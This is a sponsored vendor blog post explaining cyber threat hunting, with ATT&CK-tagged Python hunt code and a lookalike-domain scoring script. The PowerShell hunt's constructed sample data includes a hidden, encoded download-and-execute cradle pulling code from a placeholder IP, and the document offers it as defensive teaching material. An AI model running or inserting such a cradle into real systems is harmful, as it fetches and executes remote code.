Editor’s Note: This is a partnered, sponsored guest blog written by Avertium.
What is threat hunting?
Cyber threat hunting is a proactive cybersecurity strategy that searches networks and endpoints to detect and isolate advanced threats before they announce themselves through alerts. Threat hunters do not simply wait for active threats to trigger a detection. They search for adversary tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), indicators of attack (IOAs), and threats such as advanced persistent threats (APTs) that are evading your existing security controls. Although threat hunters have a variety of strategies at their disposal, the best strategy is usually determined by the type of threat they are hunting.
Threat hunting vs. threat detection
At its core, threat hunting is more than just detection and response. While threat detection focuses on identifying evidence of an attack such as correlated events or signature-based detection, threat hunting takes a more proactive approach to cybersecurity. Threat hunting is intended to counteract an adversary that is in the organization’s environment but has not yet shown any indicators of compromise.
Threat detection relies on indicators of compromise because:
- IOCs are predictable
- IOCs are logical and quantifiable
- IOCs are static and NOT permutable
- IOCs are visible and discoverable
In comparison, threat hunting uses threat indicators as the starting point or hypothesis for a hunt. Virtual fingerprints left by malware or an attacker, an unusual IP address, phishing emails, or other unexpected network traffic are all such indicators. In other words, threat hunting does not wait for IOCs to appear before seeking out security breaches.
Threat hunting is more focused on indicators of attack (IOA):
- IOAs focus on detecting intent
- IOAs are patterns of behavior that often precede an attack
Both threat detection and threat hunting are complementary approaches to identifying and responding to security threats. They are most effective when used in tandem. While threat detection provides vital defensive measures, threat hunting is the offensive playbook for outmaneuvering an enemy before they have the chance to act.
In a non-security setting, consider the following analogy. An effective criminal does research before staging a robbery. A bank that relies solely on threat detection is only alerted once IOCs are flagged, by which time the criminal has already accessed the vault. A bank that also threat hunts would be continuously on alert for IOAs, allowing its security team to respond to suspicious activity before any plan is executed. A plotting bank robber would likely investigate the security systems, walk around the premises, and note the layout of the bank and the location of the vault before returning to perform the heist. None of these IOAs individually signals an imminent threat, but viewed together in context they give reason to monitor the individual.
Technology, methodologies, and frameworks for threat hunting
Effective threat hunters hypothesize the most likely tactics and attack chains by thinking like their enemies. That said, there is no one-size-fits-all tactical approach to threat hunting. Instead, effective threat hunters rely on an arsenal of effective tools, frameworks, and methodologies for hunting threats.
Threat hunting technology and tips
1. Using SIEM technology alongside MITRE ATT&CK
How do you stop a threat when you are not sure it even exists? You hunt for it. To be a successful threat hunter, you need to stay one step ahead of your adversaries: understand their perspective, form a hypothesis about the existence of a threat, work out how you would detect it, and then stop it. The MITRE ATT&CK framework is a good starting point for understanding attackers. It provides a catalog of real-world adversary tactics and techniques, each with an identifier you can attach to a detection or hunt so that coverage can be tracked.
Using the MITRE ATT&CK framework to inform your SIEM configuration, you can streamline threat hunting via:
- An end-to-end threat hunting workflow that enables you to rapidly spot leading and active indicators of attack.
- Custom and pre-built dashboards that visualize data to identify known adversarial techniques and tactics.
- Out-of-the-box content that saves you precious time and streamlines work into a single user interface.
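The workflow above, hypothesis first and detection second, is easier to see with a concrete hunt. The following is an added example, not Avertium's or LogRhythm's code and not a SIEM product feature: each hunt function encodes one hypothesis and is tagged with the ATT&CK technique it tests for (T1059.001, T1053.005 and T1547.001 are real ATT&CK identifiers), runs over constructed Windows-style event records (the hostnames, users, paths and the 198.51.100.7 address are made up), and the results are grouped per host so the hunter sees tactic progression rather than isolated alerts.

```python
"""Hypothesis-driven hunt over constructed Windows event records, with each
detection mapped to the MITRE ATT&CK technique it tests for.
Added example, not Avertium's or LogRhythm's code; all event data is constructed."""
import base64
import re
from collections import defaultdict

# Constructed sample telemetry (not real logs). event_id 4688 mimics Windows
# Security "process created" (image + command line); event_id 13 mimics
# Sysmon "registry value set" (target key + written value).
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
    .encode("utf-16-le")).decode()

EVENTS = [
    {"host": "ws-017", "user": "jdoe", "event_id": 4688,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"host": "ws-017", "user": "jdoe", "event_id": 4688,
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc onlogon /tn Updater /tr "C:\Users\jdoe\AppData\Roaming\up.exe"'},
    {"host": "srv-db01", "user": "SYSTEM", "event_id": 13,
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Helper",
     "details": r"C:\Windows\Temp\helper.exe"},
    {"host": "ws-042", "user": "asmith", "event_id": 4688,   # benign admin script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

# Paths a low-privilege attacker can write to; persistence launched from
# here is a stronger indicator of attack than the launch mechanism alone.
SUSPECT_PATH = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.I)


def hunt_t1059_001(ev):
    """T1059.001 (Command and Scripting Interpreter: PowerShell): encoded
    command with a hidden window. Decodes the payload so the analyst sees
    what actually ran, not just that something was obfuscated."""
    if ev["event_id"] != 4688 or "powershell" not in ev["image"].lower():
        return None
    m = re.search(r"-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]{20,})", ev["cmdline"], re.I)
    if not m:
        return None
    decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    return {"technique": "T1059.001", "tactic": "Execution", "evidence": decoded}


def hunt_t1053_005(ev):
    """T1053.005 (Scheduled Task): task created whose action runs from a
    user-writable path."""
    if ev["event_id"] != 4688 or not ev["image"].lower().endswith("schtasks.exe"):
        return None
    cmd = ev["cmdline"]
    if "/create" in cmd.lower() and SUSPECT_PATH.search(cmd):
        return {"technique": "T1053.005", "tactic": "Persistence", "evidence": cmd}
    return None


def hunt_t1547_001(ev):
    """T1547.001 (Registry Run Keys): Run/RunOnce value pointing at a
    user-writable path."""
    if ev["event_id"] != 13:
        return None
    if (re.search(r"\\CurrentVersion\\Run(Once)?\\", ev["target"], re.I)
            and SUSPECT_PATH.search(ev["details"])):
        return {"technique": "T1547.001", "tactic": "Persistence",
                "evidence": f'{ev["target"]} = {ev["details"]}'}
    return None


HUNTS = (hunt_t1059_001, hunt_t1053_005, hunt_t1547_001)


def run_hunt(events):
    """Run every hypothesis over every event; return ATT&CK-tagged findings."""
    findings = []
    for ev in events:
        for hunt in HUNTS:
            hit = hunt(ev)
            if hit:
                findings.append({"host": ev["host"], "user": ev["user"], **hit})
    return findings


def chains_by_host(findings):
    """Group findings per host so Execution followed by Persistence on one
    machine reads as an attack chain rather than two unrelated alerts."""
    chains = defaultdict(list)
    for f in findings:
        chains[f["host"]].append((f["tactic"], f["technique"]))
    return dict(chains)


if __name__ == "__main__":
    found = run_hunt(EVENTS)
    for f in found:
        print(f'{f["host"]:9} {f["technique"]:10} {f["tactic"]:12} {f["evidence"][:60]}')
    for host, chain in chains_by_host(found).items():
        print(host, "->", " > ".join(f"{t} ({tech})" for t, tech in chain))
```

Only ws-017 and srv-db01 produce findings; the benign PowerShell backup script on ws-042 does not, because the hypothesis is "hidden window plus encoded command", not "PowerShell ran". Tagging each hunt with its technique ID is what lets you lay the results over an ATT&CK matrix in a SIEM dashboard and see which tactics your current hunts cover and which they do not.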
2. Machine learning/artificial intelligence
The complexity and volume of cyber threats are evolving at a dangerously rapid pace. With the shortage of qualified analysts, inefficient manual processes, and the growing cost of securing a business, organizations of all sizes are exposed to countless risks.
Avertium’s Cyber Fusion Centers (CFCs) and LogRhythm’s SOC analysts both apply artificial intelligence (AI) and machine learning (ML) to stay ahead. The approach is to incorporate security technology that uses AI to automate tasks associated with threat detection, incident response, and administration.
LogRhythm UEBA uses ML to detect potentially hidden threats and adapts as your environment changes. It combines supervised and unsupervised learning for continuous, automated tuning without manual intervention, so detection improves over time.
3. Threat intelligence
Cyber threat intelligence (CTI) is a body of information about attempted or successful breaches, gathered and evaluated by analysts and by automated systems, including ones that use machine learning and artificial intelligence. Used well, threat intelligence helps you hunt down threats and shifts your security from reaction toward prevention.
Put simply, threat hunting begins where threat intelligence ends. CTI therefore plays an essential role in keeping your security operations staff up to date on active threat actors and the latest TTPs likely to be used against your company.
A proper threat hunt takes advantage of CTI to conduct a comprehensive, system-wide search for threat actors.
Ariel Ropek, Avertium’s Director of Cyber Threat Intelligence, gives a concrete example of what the value of threat intelligence looks like in practice:
“The Conti and Ryuk ransomware kill chains both begin with TrickBot malware as the initial infection. Conti progresses to the PowerShell Empire toolset for persistence and command and control (C2), while Ryuk typically uses Cobalt Strike for C2 operations. If a threat hunter observed IOCs related to TrickBot malware in an environment, they could use this intelligence to expand their hunt to both PS Empire and Cobalt Strike IOCs. The result of those searches would indicate whether Conti or Ryuk was the likely adversary and inform incident response teams of appropriate next steps.”
Intelligence-driven threat hunting links malicious activity to known entities and gives threat hunters additional context about how far the kill chain has progressed as well as what the adversary is likely to do next.
Managed detection and response (MDR) is an outsourced managed security service that provides organizations with threat hunting services and responds to threats once they are discovered. It is yet another tool in the toolbox but is not all-inclusive.
Endpoint detection and response (EDR) continuously and automatically monitors endpoint activity, such as process execution, file and registry changes, and network connections, for suspicious behavior. It alerts security teams to anomalous activity so they can identify and contain threats on the endpoint.
Additional tools that could be used within your threat hunting program
- YARA is a tool that helps malware researchers identify and classify malware samples, among other things. You use YARA to write descriptions of malware families (or anything else) based on textual or binary patterns. Each rule, or description, consists of a set of strings and a boolean condition that defines the logic of the rule. It is used by a who’s who of cybersecurity companies in our industry.
- dnstwist is a domain name permutation engine for detecting homograph phishing attacks, typosquatting, and brand impersonation. It finds lookalike domains that adversaries could register to attack your business or your customers.
- Phishing Catcher identifies possible phishing domains in near real time. It consumes the CertStream feed of certificates published to Certificate Transparency logs and scores suspicious TLS certificate issuances as they appear.
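The last two tools combine naturally: generate the lookalike domains an attacker might register, then score every certificate name coming off a Certificate Transparency feed against them. The following is an added example of that combination, written here and not taken from the dnstwist or Phishing Catcher projects; the protected domain examplebank.com, the keyword weights, the homoglyph table and the certificate names in CT_FEED are all constructed, and the registrable-domain split is a deliberate simplification (a production tool would use the Public Suffix List).

```python
"""Lookalike-domain hunting: dnstwist-style permutations of a protected
domain, then Phishing Catcher-style scoring of certificate subject names.
Added example, not code from either project; all inputs are constructed."""
import re

BRAND = "examplebank.com"   # constructed protected domain, stands in for yours
HOMOGLYPHS = {"o": "0", "l": "1", "i": "l", "e": "3", "a": "4", "s": "5", "m": "rn", "w": "vv"}
KEYWORDS = {"login": 25, "secure": 20, "account": 20, "verify": 25, "update": 15, "support": 10}
ALT_TLDS = ("net", "org", "co", "info")


def permutations(domain):
    """Typosquat candidates: omission, repetition, transposition, homoglyph,
    hyphenation, single-character addition and TLD swap."""
    name, tld = domain.lower().rsplit(".", 1)
    out = set()
    for i, ch in enumerate(name):
        out.add(name[:i] + name[i + 1:])                        # omission
        out.add(name[:i] + ch + name[i:])                       # repetition
        if i + 1 < len(name):
            out.add(name[:i] + name[i + 1] + ch + name[i + 2:])   # transposition
        if ch in HOMOGLYPHS:
            out.add(name[:i] + HOMOGLYPHS[ch] + name[i + 1:])   # homoglyph
        if i > 0:
            out.add(name[:i] + "-" + name[i:])                  # hyphenation
    for c in "abcdefghijklmnopqrstuvwxyz0123456789":
        out.add(name + c)                                       # addition
    out.discard(name)
    result = {f"{n}.{tld}" for n in out}
    result.update(f"{name}.{t}" for t in ALT_TLDS if t != tld)  # TLD swap
    return result


def levenshtein(a, b):
    """Edit distance, to catch typos the permutation list did not enumerate."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def score(cert_name, lookalikes, brand=BRAND):
    """Heuristic risk score for one certificate subject name, with reasons."""
    cn = cert_name.lower().lstrip("*.")          # wildcard certs: drop the "*."
    name = brand.split(".")[0]
    if cn == brand or cn.endswith("." + brand):
        return 0, ["owned domain"]
    labels = cn.split(".")
    registrable = ".".join(labels[-2:])          # crude; real tools use the Public Suffix List
    points, reasons = 0, []
    if registrable in lookalikes:
        points += 70
        reasons.append("lookalike of " + brand)
    elif any(lbl != name and levenshtein(lbl, name) <= 2 for lbl in labels[:-1]):
        points += 50
        reasons.append("label within edit distance 2 of " + name)
    if name in cn:                               # brand used as bait inside another domain
        points += 40
        reasons.append("brand string embedded")
    for kw, weight in KEYWORDS.items():
        if kw in cn:
            points += weight
            reasons.append("keyword " + kw)
    if re.search(r"\.com-|-com\.", cn):          # "brand.com-verify.net" style fake TLD
        points += 20
        reasons.append("fake .com embedded")
    points += 3 * cn.count("-")                  # many hyphens and deep subdomains are cheap signals
    points += 3 * max(0, cn.count(".") - 2)
    return points, reasons


# Constructed Certificate Transparency entries (subject common names), as a
# CertStream consumer would see them. Not real certificates.
CT_FEED = [
    "www.examplebank.com",
    "*.examplebank.com",
    "login.examp1ebank.com",
    "examplebank.com-secure-verify.net",
    "examplebank-support.co",
    "shop.greatbakes.org",
]


def hunt(feed, threshold=50, brand=BRAND):
    """Return (name, score, reasons) for every entry at or above threshold, highest first."""
    lookalikes = permutations(brand)
    flagged = []
    for cn in feed:
        points, reasons = score(cn, lookalikes, brand)
        if points >= threshold:
            flagged.append((cn, points, reasons))
    return sorted(flagged, key=lambda item: -item[1])


if __name__ == "__main__":
    for cn, points, reasons in hunt(CT_FEED):
        print(f"{points:4} {cn:40} {'; '.join(reasons)}")
```

Run against the constructed feed, the two owned names score zero, the bakery scores zero, and the three impersonation attempts are flagged with different reasons: a homoglyph registrable domain, the brand embedded ahead of a fake ".com-", and the brand string reused in a hyphenated name. The weights are arbitrary starting points; the value of the pattern is that each flag carries the reasons, so an analyst can tune thresholds against what their own feed produces rather than trusting a single opaque score.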
Threat Hunting Methodologies
Threat hunting methodologies fall into two types, structured and unstructured hunting, depending on the approach.
Structured threat hunting is based on indicators of attack and the TTPs of an attacker. It leverages the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) framework to cover both pre-compromise and in-network behavior. Note that the separate PRE-ATT&CK matrix has since been folded into Enterprise ATT&CK as the Reconnaissance and Resource Development tactics, so current hunts should reference Enterprise ATT&CK for both.
Unstructured hunting is based on a trigger, such as a detected IOC, and follows that lead through whatever data is available.
Types of structured threat hunts:
- Hypothesis-based hunting leverages global detection frameworks to understand the TTPs of attackers and the IOAs they produce. By applying known patterns of attacker behavior to one’s own environment, hunters can find attackers early in the attack chain, before they reach their objective. There are three generally recognized hypothesis-based types: awareness, intelligence, and analytics.
- Awareness: using situational awareness and current knowledge of the environment to identify the most critical threats to target during the hunt.
- Intelligence: an intelligence-driven hypothesis is developed from typical threat actor TTPs. The hunters test it by observing and inspecting the network and systems to see whether those TTP behaviors are present in the environment. IOCs or IOAs can also be used to support intelligence-based hypotheses.
- Analytics: an analytics-driven hypothesis is developed from existing structured frameworks and models, as well as from the output of machine learning and artificial intelligence.
Types of unstructured threat hunts:
- Data-driven hunting: the hunter combs through accessible data looking for anomalies that might reveal suspicious activity. This kind of threat hunting is unstructured because it does not begin with a hypothesis and does not follow a preset path.
- Intelligence-based hunting, or intel-based hunting, is driven by threat intelligence to search for attack patterns related to specific threat actors, malware variants, or campaigns. CTI analysts develop detailed profiles of threat actors, which tell hunters what course of action, or kill chain, an adversary is likely to take. These threat actor kill chains are closely aligned with the MITRE ATT&CK framework and define the specific TTPs an attacker would likely use at each stage of the attack. For example, if a hunter detected an IOC related to reconnaissance by a known threat actor group, threat intelligence could tell the hunter what attack patterns to anticipate next.
Putting the context of threat hunting into action
The tactics, techniques, and procedures of bad actors are always evolving. Adaptive adversaries call for adaptive security. A holistic, risk-based approach to cybersecurity layers services, technology capabilities, and proven security frameworks like MITRE ATT&CK with strategy and client collaboration to deliver a more resilient security posture. See the resources below for additional help with your threat hunting planning.
Read more on threat hunting resources
- Understanding Cybersecurity Best Practice
- The MITRE ATT&CK framework
- A contribution from LogRhythm’s perspective on Threat Hunting
- A contribution from LogRhythm’s perspective on the LogRhythm UEBA
- How WhisperGate Affects the US and Ukraine
- Managed detection and response (MDR)
- Endpoint detection and response (EDR)
- Using MITRE ATT&CK Framework for Beyond-Checkbox Cybersecurity
- MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK)